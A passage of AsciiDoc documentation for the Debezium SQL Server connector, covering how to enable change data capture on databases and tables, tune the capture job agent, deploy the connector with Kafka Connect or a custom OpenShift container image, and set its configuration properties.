`scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|`DECIMAL[(P[,S])]`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|`SMALLMONEY`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|`MONEY`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|===\n\ndecimal.handling.mode=double::\n+\n.Mappings when `decimal.handling.mode=double`\n[cols=\"30%a,30%a,40%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|SQL Server type |Literal type |Semantic type\n\n|`NUMERIC[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|`SMALLMONEY[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|`MONEY[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|===\n\ndecimal.handling.mode=string::\n+\n.Mappings when `decimal.handling.mode=string`\n[cols=\"30%a,30%a,40%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|SQL Server type |Literal type |Semantic type\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`SMALLMONEY[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`MONEY[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-sql-server-for-use-with-the-debezium-sql-server-connector\n\/\/Title: Setting up SQL Server to run a {prodname} connector\n[[setting-up-sqlserver]]\n== Setting up SQL Server\n\nFor {prodname} to capture change events from SQL Server tables, a SQL Server administrator with the necessary privileges must first run a query to enable CDC on the database.\nThe administrator must then enable CDC for each table that you want Debezium to capture.\n\n[NOTE]\n====\nBy default, JDBC connections to Microsoft SQL Server are protected by SSL encryption.\nIf SSL is not enabled for a SQL Server database, or if you want to connect to the database without using SSL, you can disable SSL by setting the value of the `database.encrypt` property in connector configuration to `false`.\n====\n\nifdef::product[]\n\nFor details about setting up SQL Server for use with the {prodname} connector, see the following sections:\n\n* xref:enabling-cdc-on-the-sql-server-database[]\n* xref:enabling-cdc-on-a-sql-server-table[]\n* xref:verifying-debezium-connector-access-to-the-cdc-table[]\n* xref:debezium-sql-server-connector-on-azure[]\n* xref:effect-of-sql-server-capture-job-agent-configuration-on-server-load-and-latency[]\n* xref:sql-server-capture-job-agent-configuration-parameters[]\n\nendif::product[]\n\nAfter CDC is applied, it captures all of the `INSERT`, `UPDATE`, and `DELETE` operations that are committed to the tables for which CDD is enabled.\nThe {prodname} connector can then capture these events and emit them to Kafka topics.\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-cdc-on-the-sql-server-database\n=== Enabling CDC on the SQL Server database\n\nBefore you can enable CDC for a table, you must enable it for the SQL Server database.\nA SQL Server administrator enables CDC by running a system stored procedure.\nSystem stored procedures can be run by using SQL Server Management Studio, or by using Transact-SQL.\n\n.Prerequisites\n* You are a member of the _sysadmin_ fixed server role for the SQL Server.\n* You are a db_owner of the database.\n* The SQL Server Agent is running.\n\nNOTE: The SQL Server CDC feature processes changes that occur in user-created tables only. You cannot enable CDC on the SQL Server `master` database.\n\n.Procedure\n\n. From the *View* menu in SQL Server Management Studio, click *Template Explorer*.\n. In the *Template Browser*, expand *SQL Server Templates*.\n. Expand *Change Data Capture > Configuration* and then click *Enable Database for CDC*.\n. In the template, replace the database name in the `USE` statement with the name of the database that you want to enable for CDC.\n. Run the stored procedure `sys.sp_cdc_enable_db` to enable the database for CDC.\n+\nAfter the database is enabled for CDC, a schema with the name `cdc` is created, along with a CDC user, metadata tables, and other system objects.\n+\nThe following example shows how to enable CDC for the database `MyDB`:\n+\n.Example: Enabling a SQL Server database for the CDC template\n[source,sql]\n----\nUSE MyDB\nGO\nEXEC sys.sp_cdc_enable_db\nGO\n----\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-cdc-on-a-sql-server-table\n=== Enabling CDC on a SQL Server table\n\nA SQL Server administrator must enable change data capture on the source tables that you want to Debezium to capture.\nThe database must already be enabled for CDC.\nTo enable CDC on a table, a SQL Server administrator runs the stored procedure `sys.sp_cdc_enable_table` for the table.\nThe stored procedures can be run by using SQL Server Management Studio, or by using Transact-SQL.\nSQL Server CDC must be enabled for every table that you want to capture.\n\n.Prerequisites\n* CDC is enabled on the SQL Server database.\n* The SQL Server Agent is running.\n* You are a member of the `db_owner` fixed database role for the database.\n\n.Procedure\n. From the *View* menu in SQL Server Management Studio, click *Template Explorer*.\n. In the *Template Browser*, expand *SQL Server Templates*.\n. Expand *Change Data Capture > Configuration*, and then click *Enable Table Specifying Filegroup Option*.\n. In the template, replace the table name in the `USE` statement with the name of the table that you want to capture.\n. Run the stored procedure `sys.sp_cdc_enable_table`.\n+\nThe following example shows how to enable CDC for the table `MyTable`:\n+\n.Example: Enabling CDC for a SQL Server table\n[source,sql]\n----\nUSE MyDB\nGO\n\nEXEC sys.sp_cdc_enable_table\n@source_schema = N'dbo',\n@source_name = N'MyTable', \/\/<.>\n@role_name = N'MyRole', \/\/<.>\n@filegroup_name = N'MyDB_CT',\/\/<.>\n@supports_net_changes = 0\nGO\n----\n<.> Specifies the name of the table that you want to capture.\n<.> Specifies a role `MyRole` to which you can add users to whom you want to grant `SELECT` permission on the captured columns of the source table.\nUsers in the `sysadmin` or `db_owner` role also have access to the specified change tables. Set the value of `@role_name` to `NULL`, to allow only members in the `sysadmin` or `db_owner` to have full access to captured information.\n<.> Specifies the `filegroup` where SQL Server places the change table for the captured table.\nThe named `filegroup` must already exist.\nIt is best not to locate change tables in the same `filegroup` that you use for source tables.\n\n\n\/\/ Type: procedure\n\/\/ ModuleID: verifying-debezium-connector-access-to-the-cdc-table\n=== Verifying that the user has access to the CDC table\n\nA SQL Server administrator can run a system stored procedure to query a database or table to retrieve its CDC configuration information.\nThe stored procedures can be run by using SQL Server Management Studio, or by using Transact-SQL.\n\n.Prerequisites\n* You have `SELECT` permission on all of the captured columns of the capture instance.\nMembers of the `db_owner` database role can view information for all of the defined capture instances.\n* You have membership in any gating roles that are defined for the table information that the query includes.\n\n.Procedure\n\n. From the *View* menu in SQL Server Management Studio, click *Object Explorer*.\n. From the Object Explorer, expand *Databases*, and then expand your database object, for example, *MyDB*.\n. Expand *Programmability > Stored Procedures > System Stored Procedures*.\n. Run the `sys.sp_cdc_help_change_data_capture` stored procedure to query the table.\n+\nQueries should not return empty results.\n+\nThe following example runs the stored procedure `sys.sp_cdc_help_change_data_capture` on the database `MyDB`:\n+\n.Example: Querying a table for CDC configuration information\n[source, sql]\n----\nUSE MyDB;\nGO\nEXEC sys.sp_cdc_help_change_data_capture\nGO\n----\n+\nThe query returns configuration information for each table in the database that is enabled for CDC and that contains change data that the caller is authorized to access.\nIf the result is empty, verify that the user has privileges to access both the capture instance and the CDC tables.\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-sql-server-connector-on-azure\n[[sqlserver-on-azure]]\n=== SQL Server on Azure\n\nThe {prodname} SQL Server connector can be used with SQL Server on Azure.\nRefer to https:\/\/docs.microsoft.com\/en-us\/samples\/azure-samples\/azure-sql-db-change-stream-debezium\/azure-sql-db-change-stream-debezium\/[this example] for configuring CDC for SQL Server on Azure and using it with {prodname}.\n\nifdef::community[]\n\n[[sqlserver-always-on-replica]]\n=== SQL Server Always On\n\nThe SQL Server connector can capture changes from an Always On read-only replica.\n\n.Prerequisites\n* Change data capture is configured and enabled on the primary node.\nSQL Server does not support CDC directly on replicas.\n* The configuration option `database.applicationIntent` is set to `ReadOnly`.\nThis is required by SQL Server.\nWhen {prodname} detects this configuration option, it responds by taking the following actions:\n\n** Sets `snapshot.isolation.mode` to `snapshot`, which is the only one transaction isolation mode supported for read-only replicas.\n** Commits the (read-only) transaction in every execution of the streaming query loop, which is necessary to get the latest view of CDC data.\n\nendif::community[]\n\n\/\/ Type: concept\n\/\/ ModuleID: effect-of-sql-server-capture-job-agent-configuration-on-server-load-and-latency\n=== Effect of SQL Server capture job agent configuration on server load and latency\n\nWhen a database administrator enables change data capture for a source table, the capture job agent begins to run.\nThe agent reads new change event records from the transaction log and replicates the event records to a change data table.\nBetween the time that a change is committed in the source table, and the time that the change appears in the corresponding change table, there is always a small latency interval.\nThis latency interval represents a gap between when changes occur in the source table and when they become available for {prodname} to stream to Apache Kafka.\n\nIdeally, for applications that must respond quickly to changes in data, you want to maintain close synchronization between the source and change tables.\nYou might imagine that running the capture agent to continuously process change events as rapidly as possible might result in increased throughput and reduced latency --\npopulating change tables with new event records as soon as possible after the events occur, in near real time.\nHowever, this is not necessarily the case.\nThere is a performance penalty to pay in the pursuit of more immediate synchronization.\nEach time that the capture job agent queries the database for new event records, it increases the CPU load on the database host.\nThe additional load on the server can have a negative effect on overall database performance, and potentially reduce transaction efficiency, especially during times of peak database use.\n\nIt's important to monitor database metrics so that you know if the database reaches the point where the server can no longer support the capture agent's level of activity.\nIf you notice performance problems, there are SQL Server capture agent settings that you can modify to help balance the overall CPU load on the database host with a tolerable degree of latency.\n\n\/\/ Type: reference\n\/\/ ModuleID: sql-server-capture-job-agent-configuration-parameters\n=== SQL Server capture job agent configuration parameters\n\nOn SQL Server, parameters that control the behavior of the capture job agent are defined in the SQL Server table link:https:\/\/docs.microsoft.com\/en-us\/sql\/relational-databases\/system-tables\/dbo-cdc-jobs-transact-sql?view=latest[`msdb.dbo.cdc_jobs`].\nIf you experience performance issues while running the capture job agent, adjust capture jobs settings to reduce CPU load by running the link:https:\/\/docs.microsoft.com\/en-us\/sql\/relational-databases\/system-stored-procedures\/sys-sp-cdc-change-job-transact-sql?view=latest[`sys.sp_cdc_change_job`] stored procedure and supplying new values.\n\n[NOTE]\n====\nSpecific guidance about how to configure SQL Server capture job agent parameters is beyond the scope of this documentation.\n====\n\nThe following parameters are the most significant for modifying capture agent behavior for use with the {prodname} SQL Server connector:\n\n`pollinginterval`::\n* Specifies the number of seconds that the capture agent waits between log scan cycles.\n* A higher value reduces the load on the database host and increases latency.\n* A value of `0` specifies no wait between scans.\n* The default value is `5`.\n\n`maxtrans`::\n* Specifies the maximum number of transactions to process during each log scan cycle.\nAfter the capture job processes the specified number of transactions, it pauses for the length of time that the `pollinginterval` specifies before the next scan begins.\n* A lower value reduces the load on the database host and increases latency.\n* The default value is `500`.\n\n`maxscans`::\n* Specifies a limit on the number of scan cycles that the capture job can attempt in capturing the full contents of the database transaction log.\nIf the `continuous` parameter is set to `1`, the job pauses for the length of time that the `pollinginterval` specifies before it resumes scanning.\n* A lower values reduces the load on the database host and increases latency.\n* The default value is `10`.\n\n.Additional resources\n* For more information about capture agent parameters, see the SQL Server documentation.\n\n\/\/ Type: assembly\n\/\/ ModuleID: deployment-of-debezium-sql-server-connectors\n\/\/ Title: Deployment of {prodname} SQL Server connectors\n[[sqlserver-deploying-a-connector]]\n== Deployment\n\nifdef::community[]\nTo deploy a {prodname} SQL Server connector, you install the {prodname} SQL Server connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect.\n\n.Prerequisites\n* link:https:\/\/zookeeper.apache.org\/[Apache ZooKeeper], link:http:\/\/kafka.apache.org\/[Apache Kafka], and link:{link-kafka-docs}.html#connect[Kafka Connect] are installed.\n* SQL Server is installed, is xref:{link-sqlserver-connector}#setting-up-sqlserver[configured for CDC], and is ready to be used with the {prodname} connector.\n\n.Procedure\n. Download the {prodname} https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-sqlserver\/{debezium-version}\/debezium-connector-sqlserver-{debezium-version}-plugin.tar.gz[SQL Server connector plug-in archive]\n. Extract the files into your Kafka Connect environment.\n. Add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`].\n. xref:{link-sqlserver-connector}#sqlserver-example-configuration[Configure the connector] and xref:{link-sqlserver-connector}#sqlserver-adding-connector-configuration[add the configuration to your Kafka Connect cluster.]\n. Restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s container images] for \u00c5pache ZooKeeper, Apache Kafka, and Kafka Connect.\nYou can pull the official link:https:\/\/hub.docker.com\/_\/microsoft-mssql-server[container images for Microsoft SQL Server on Linux] from Docker Hub.\n\nYou can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\nendif::community[]\n\nifdef::product[]\nYou can use either of the following methods to deploy a {prodname} SQL Server connector:\n\n* xref:openshift-streams-sqlserver-connector-deployment[Use {StreamsName} to automatically create an image that includes the connector plug-in].\n+\nThis is the preferred method.\n* xref:deploying-debezium-sqlserver-connectors[Build a custom Kafka Connect container image from a Dockerfile].\n\n.Additional resources\n\n* xref:descriptions-of-debezium-sqlserver-connector-configuration-properties[]\n\n\/\/ Type: concept\n[id=\"openshift-streams-sqlserver-connector-deployment\"]\n=== SQL Server connector deployment using {StreamsName}\n\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-streams-deployment.adoc[leveloffset=+1]\n\n\/\/ Type: procedure\n[id=\"using-streams-to-deploy-debezium-sqlserver-connectors\"]\n=== Using {StreamsName} to deploy a {prodname} SQL Server connector\ninclude::{partialsdir}\/modules\/all-connectors\/proc-using-streams-to-deploy-a-debezium-connector.adoc[leveloffset=+1]\n\n\/\/ Type: procedure\n\/\/ ModuleID: deploying-debezium-sqlserver-connectors\n[[sql-server-deploying-a-connector]]\n=== Deploying a {prodname} SQL Server connector by building a custom Kafka Connect container image from a Dockerfile\n\nTo deploy a {prodname} SQL Server connector, you must build a custom Kafka Connect container image that contains the {prodname} connector archive, and then push this container image to a container registry.\nYou then need to create the following custom resources (CRs):\n\n* A `KafkaConnect` CR that defines your Kafka Connect instance.\n The `image` property in the CR specifies the name of the container image that you create to run your {prodname} connector.\n You apply this CR to the OpenShift instance where link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat {StreamsName}] is deployed.\n {StreamsName} offers operators and images that bring Apache Kafka to OpenShift.\n\n* A `KafkaConnector` CR that defines your {prodname} SQL Server connector.\n Apply this CR to the same OpenShift instance where you apply the `KafkaConnect` CR.\n\n.Prerequisites\n\n* SQL Server is running and you completed the steps to {LinkDebeziumUserGuide}#setting-up-sql-server-for-use-with-the-debezium-sql-server-connector[set up SQL Server to work with a {prodname} connector].\n\n* {StreamsName} is deployed on OpenShift and is running Apache Kafka and Kafka Connect.\n For more information, see link:{LinkDeployStreamsOpenShift}[{NameDeployStreamsOpenShift}]\n\n* Podman or Docker is installed.\n\n* You have an account and permissions to create and manage containers in the container registry (such as `quay.io` or `docker.io`) to which you plan to add the container that will run your Debezium connector.\n\n.Procedure\n\n. Create the {prodname} SQL Server container for Kafka Connect:\n\n.. Create a Dockerfile that uses `{DockerKafkaConnect}` as the base image.\nFor example, from a terminal window, enter the following command:\n+\n[source,shell,subs=\"+attributes,+quotes\"]\n----\ncat <<EOF >debezium-container-for-sqlserver.yaml \/\/ <1>\nFROM {DockerKafkaConnect}\nUSER root:root\nRUN mkdir -p \/opt\/kafka\/plugins\/debezium \/\/ <2>\nRUN curl -O {red-hat-maven-repository}debezium\/debezium-connector-{connector-file}\/{debezium-version}-redhat-__<build_number>__\/debezium-connector-{connector-file}-{debezium-version}-redhat-__<build_number>__-plugin.zip\nUSER 1001\nEOF\n----\n<1> You can specify any file name that you want.\n<2> Specifies the path to your Kafka Connect plug-ins directory. If your Kafka Connect plug-ins directory is in a different location, replace this path with the actual path of your directory.\n+\nThe command creates a Dockerfile with the name `debezium-container-for-sqlserver.yaml` in the current directory.\n\n.. Build the container image from the `debezium-container-for-sqlserver.yaml` Docker file that you created in the previous step.\nFrom the directory that contains the file, open a terminal window and enter one of the following commands:\n+\n[source,shell,options=\"nowrap\"]\n----\npodman build -t debezium-container-for-sqlserver:latest .\n----\n+\n[source,shell,options=\"nowrap\"]\n----\ndocker build -t debezium-container-for-sqlserver:latest .\n----\nThe preceding commands build a container image with the name `debezium-container-for-sqlserver`.\n\n.. Push your custom image to a container registry, such as quay.io or an internal container registry.\nThe container registry must be available to the OpenShift instance where you want to deploy the image.\nEnter one of the following commands:\n+\n[source,shell,subs=\"+quotes\"]\n----\npodman push _<myregistry.io>_\/debezium-container-for-sqlserver:latest\n----\n+\n[source,shell,subs=\"+quotes\"]\n----\ndocker push _<myregistry.io>_\/debezium-container-for-sqlserver:latest\n----\n\n.. Create a new {prodname} SQL Server KafkaConnect custom resource (CR).\nFor example, create a KafkaConnect CR with the name `dbz-connect.yaml` that specifies `annotations` and `image` properties as shown in the following example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnect\nmetadata:\n name: my-connect-cluster\n annotations:\n strimzi.io\/use-connector-resources: \"true\" \/\/ <1>\nspec:\n #...\n image: debezium-container-for-sqlserver \/\/ <2>\n----\n<1> `metadata.annotations` indicates to the Cluster Operator that KafkaConnector resources are used to configure connectors in this Kafka Connect cluster.\n<2> `spec.image` specifies the name of the image that you created to run your Debezium connector.\nThis property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator\n\n.. Apply the `KafkaConnect` CR to the OpenShift Kafka Connect environment by entering the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc create -f dbz-connect.yaml\n----\n+\nThe command adds a Kafka Connect instance that specifies the name of the image that you created to run your {prodname} connector.\n\n. Create a `KafkaConnector` custom resource that configures your {prodname} SQL Server connector instance.\n+\nYou configure a {prodname} SQL Server connector in a `.yaml` file that specifies the configuration properties for the connector.\nThe connector configuration might instruct {prodname} to produce events for a subset of the schemas and tables, or it might set properties so that {prodname} ignores, masks, or truncates values in specified columns that are sensitive, too large, or not needed.\n+\nThe following example configures a {prodname} connector that connects to a SQL server host, `192.168.99.100`, on port `1433`.\nThis host has a database named `testDB`, a table with the name `customers`, and `fulfillment` is the server's logical name.\n+\n.SQL Server `fulfillment-connector.yaml`\n[source,yaml,subs=\"+attributes\",options=\"nowrap\"]\n----\napiVersion: {KafkaConnectorApiVersion}\nkind: KafkaConnector\nmetadata:\n name: fulfillment-connector \/\/ <1>\n labels:\n strimzi.io\/cluster: my-connect-cluster\n annotations:\n strimzi.io\/use-connector-resources: 'true'\nspec:\n class: io.debezium.connector.sqlserver.SqlServerConnector \/\/ <2>\n config:\n database.hostname: 192.168.99.100 \/\/ <3>\n database.port: 1433 \/\/ <4>\n database.user: debezium \/\/ <5>\n database.password: dbz \/\/ <6>\n database.names: testDB1,testDB2 \/\/ <7>\n topic.prefix: fullfullment \/\/ <8>\n database.include.list: dbo.customers \/\/ <9>\n schema.history.internal.kafka.bootstrap.servers: my-cluster-kafka-bootstrap:9092 \/\/ <10>\n schema.history.internal.kafka.topic: schemahistory.fullfillment \/\/ <11>\n database.ssl.truststore: path\/to\/trust-store \/\/ <12>\n database.ssl.truststore.password: password-for-trust-store <13>\n----\n+\n.Descriptions of connector configuration settings\n[cols=\"1,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Description\n\n|1\n|The name of our connector when we register it with a Kafka Connect service.\n\n|2\n|The name of this SQL Server connector class.\n\n|3\n|The address of the SQL Server instance.\n\n|4\n|The port number of the SQL Server instance.\n\n|5\n|The name of the SQL Server user.\n\n|6\n|The password for the SQL Server user.\n\n|7\n|The name of the database to capture changes from.\n\n|8\n|The topic prefix for the SQL Server instance\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the xref:{link-avro-serialization}#avro-serialization[Avro converter] is used.\n\n|9\n|A list of all tables whose changes {prodname} should capture.\n\n|10\n|The list of Kafka brokers that this connector will use to write and recover DDL statements to the database schema history topic.\n\n|11\n|The name of the database schema history topic where the connector will write and recover DDL statements. This topic is for internal use only and should not be used by consumers.\n\n|12\n|The path to the SSL truststore that stores the server's signer certificates.\nThis property is required unless database encryption is disabled (`database.encrypt=false`).\n\n|13\n|The SSL truststore password.\nThis property is required unless database encryption is disabled (`database.encrypt=false`).\n\n|===\n\n. Create your connector instance with Kafka Connect.\n For example, if you saved your `KafkaConnector` resource in the `fulfillment-connector.yaml` file, you would run the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc apply -f fulfillment-connector.yaml\n----\n+\nThe preceding command registers `fulfillment-connector` and the connector starts to run against the `testDB` database as defined in the `KafkaConnector` CR.\n\n[id=\"verifying-that-the-debezium-sqlserver-connector-is-running\"]\n=== Verifying that the {prodname} SQL Server connector is running\n\ninclude::{partialsdir}\/modules\/all-connectors\/proc-verifying-the-connector-deployment.adoc[leveloffset=+1]\n\nendif::product[]\n\nifdef::community[]\n[[sqlserver-example-configuration]]\n=== SQL Server connector configuration example\n\nFollowing is an example of the configuration for a connector instance that captures data from a SQL Server server at port 1433 on 192.168.99.100, which we logically name `fullfillment`.\nTypically, you configure the {prodname} SQL Server connector in a JSON file by setting the configuration properties that are available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables in a database.\nOptionally, you can ignore, mask, or truncate columns that contain sensitive data, that are larger than a specified size, or that you do not need.\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.sqlserver.SqlServerConnector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"1433\", \/\/ <4>\n \"database.user\": \"sa\", \/\/ <5>\n \"database.password\": \"Password!\", \/\/ <6>\n \"database.names\": \"testDB1,testDB2\", \/\/ <7>\n \"topic.prefix\": \"fullfillment\", \/\/ <8>\n \"table.include.list\": \"dbo.customers\", \/\/ <9>\n \"schema.history.internal.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"schema.history.internal.kafka.topic\": \"schemahistory.fullfillment\" \/\/ <11>\n \"database.ssl.truststore\": \"path\/to\/trust-store\" \/\/ <12>\n \"database.ssl.truststore.password\": \"password-for-trust-store\" \/\/ <13>\n }\n}\n----\n<1> The name of our connector when we register it with a Kafka Connect service.\n<2> The name of this SQL Server connector class.\n<3> The address of the SQL Server instance.\n<4> The port number of the SQL Server instance.\n<5> The name of the SQL Server user\n<6> The password for the SQL Server user\n<7> The name of the database to capture changes from.\n<8> The topic prefix for the SQL Server instance\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the xref:{link-avro-serialization}#avro-serialization[Avro converter] is used.\n<9> A list of all tables whose changes {prodname} should capture.\n<10> The list of Kafka brokers that this connector will use to write and recover DDL statements to the database schema history topic.\n<11> The name of the database schema history topic where the connector will write and recover DDL statements. This topic is for internal use only and should not be used by consumers.\n<12> The path to the SSL truststore that stores the server's signer certificates.\nThis property is required unless database encryption is disabled (`database.encrypt=false`).\n<13> The SSL truststore password.\nThis property is required unless database encryption is disabled (`database.encrypt=false`).\nendif::community[]\n\nFor the complete list of the configuration properties that you can set for the {prodname} SQL Server connector, see xref:{link-sqlserver-connector}#sqlserver-connector-properties[SQL Server connector properties].\n\nifdef::community[]\nYou can send this configuration with a `POST` command to a running Kafka Connect service.\nThe service records the configuration and start up the one connector task that performs the following tasks:\n\n* Connects to the SQL Server database.\n* Reads the transaction log.\n* Records change events to Kafka topics.\n\n[[sqlserver-adding-connector-configuration]]\n=== Adding connector configuration\n\nTo start running a {prodname} SQL Server connector, create a connector configuration, and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* xref:{link-sqlserver-connector}#setting-up-sqlserver[CDC is enabled on SQL Server].\n* The {prodname} SQL Server connector is installed.\n\n.Procedure\n\n. Create a configuration for the SQL Server connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\nendif::community[]\n\n.Results\n\nWhen the connector starts, it xref:{link-sqlserver-connector}#sqlserver-snapshots[performs a consistent snapshot] of the SQL Server databases that the connector is configured for.\nThe connector then starts generating data change events for row-level operations and streaming the change event records to Kafka topics.\n\n\/\/ Type: reference\n\/\/ Title: Descriptions of {prodname} SQL Server connector configuration properties\n\/\/ ModuleID: descriptions-of-debezium-sqlserver-connector-configuration-properties\n[[sqlserver-connector-properties]]\n=== Connector properties\n\nThe {prodname} SQL Server connector has numerous configuration properties that you can use to achieve the right connector behavior for your application.\nMany properties have default values.\n\nInformation about the properties is organized as follows:\n\n* xref:sqlserver-required-connector-configuration-properties[Required connector configuration properties]\n* xref:sqlserver-advanced-connector-configuration-properties[Advanced connector configuration properties]\n* xref:debezium-sqlserver-connector-database-history-configuration-properties[Database schema history connector configuration properties] that control how {prodname} processes events that it reads from the database schema history topic.\n** xref:sqlserver-pass-through-database-history-properties-for-configuring-producer-and-consumer-clients[Pass-through database schema history properties]\n* xref:debezium-sqlserver-connector-pass-through-database-driver-configuration-properties[Pass-through database driver properties] that control the behavior of the database driver.\n\n[id=\"sqlserver-required-connector-configuration-properties\"]\n==== Required {prodname} SQL Server connector configuration properties\n\nThe following configuration properties are _required_ unless a default value is available.\n\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[sqlserver-property-name]]<<sqlserver-property-name, `+name+`>>\n|No default\n|Unique name for the connector. Attempting to register again with the same name will fail. (This property is required by all Kafka Connect connectors.)\n\n|[[sqlserver-property-connector-class]]<<sqlserver-property-connector-class, `+connector.class+`>>\n|No default\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.sqlserver.SqlServerConnector` for the SQL Server connector.\n\n|[[sqlserver-property-tasks-max]]<<sqlserver-property-tasks-max, `+tasks.max+`>>\n|`1`\n|Specifies the maximum number of tasks that the connector can use to capture data from the database instance.\nIf the xref:sqlserver-property-database-names[`database.names`] list contains more than one element, increase the value of this property to a number less than or equal to the number of elements in the `database.names` list.\n\n|[[sqlserver-property-database-hostname]]<<sqlserver-property-database-hostname, `+database.hostname+`>>\n|No default\n|IP address or hostname of the SQL Server database server.\n\n|[[sqlserver-property-database-port]]<<sqlserver-property-database-port, `+database.port+`>>\n|`1433`\n|Integer port number of the SQL Server database server.\n\n|[[sqlserver-property-database-user]]<<sqlserver-property-database-user, `+database.user+`>>\n|No default\n|Username to use when connecting to the SQL Server database server.\nCan be omitted when using Kerberos authentication, which can be configured using xref:debezium-{context}-connector-pass-through-database-driver-configuration-properties[pass-through properties].\n\n|[[sqlserver-property-database-password]]<<sqlserver-property-database-password, `+database.password+`>>\n|No default\n|Password to use when connecting to the SQL Server database server.\n\n|[[sqlserver-property-database-instance]] <<sqlserver-property-database-instance, `+database.instance+`>>\n|No default\n|Specifies the instance name of the link:https:\/\/docs.microsoft.com\/en-us\/sql\/database-engine\/configure-windows\/database-engine-instances-sql-server?view=sql-server-latest#instances[SQL Server named instance].\n\nifdef::community[]\n|[[sqlserver-property-database-names]]<<sqlserver-property-database-names, `+database.names+`>>\n|No default\n|The comma-separated list of the SQL Server database names from which to stream the changes.\nendif::community[]\n|[[sqlserver-property-topic-prefix]]<<sqlserver-property-topic-prefix, `+topic.prefix+`>>\n|No default\n|Topic prefix that provides a namespace for the SQL Server database server that you want {prodname} to capture.\nThe prefix should be unique across all other connectors, since it is used as the prefix for all Kafka topic names that receive records from this connector.\nOnly alphanumeric characters, hyphens, dots and underscores must be used in the database server logical name. +\n +\n[WARNING]\n====\nDo not change the value of this property.\nIf you change the name value, after a restart, instead of continuing to emit events to the original topics, the connector emits subsequent events to topics whose names are based on the new value.\nThe connector is also unable to recover its database schema history topic.\n====\n\n|[[sqlserver-property-schema-include-list]]<<sqlserver-property-schema-include-list, `+schema.include.list+`>>\n|No default\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *want* to capture changes.\nAny schema name not included in `schema.include.list` is excluded from having its changes captured.\nBy default, the connector captures changes for all non-system schemas. +\n\nTo match the name of a schema, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the schema; it does not match substrings that might be present in a schema name. +\nIf you include this property in the configuration, do not also set the `schema.exclude.list` property.\n\n|[[sqlserver-property-schema-exclude-list]]<<sqlserver-property-schema-exclude-list, `+schema.exclude.list+`>>\n|No default\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *do not* want to capture changes.\nAny schema whose name is not included in `schema.exclude.list` has its changes captured, with the exception of system schemas. +\n\nTo match the name of a schema, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the schema; it does not match substrings that might be present in a schema name. +\nIf you include this property in the configuration, do not set the `schema.include.list` property.\n\n|[[sqlserver-property-table-include-list]]<<sqlserver-property-table-include-list, `+table.include.list+`>>\n|No default\n|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for tables that you want {prodname} to capture.\nBy default, the connector captures all non-system tables for the designated schemas.\nWhen this property is set, the connector captures changes only from the specified tables.\nEach identifier is of the form _schemaName_._tableName_. +\n\nTo match the name of a table, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the table; it does not match substrings that might be present in a table name. +\nIf you include this property in the configuration, do not also set the `table.exclude.list` property.\n\n|[[sqlserver-property-table-exclude-list]]<<sqlserver-property-table-exclude-list, `+table.exclude.list+`>>\n|No default\n|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for the tables that you want to exclude from being captured.\n{prodname} captures all tables that are not included in `table.exclude.list`.\nEach identifier is of the form _schemaName_._tableName_. +\n\nTo match the name of a table, 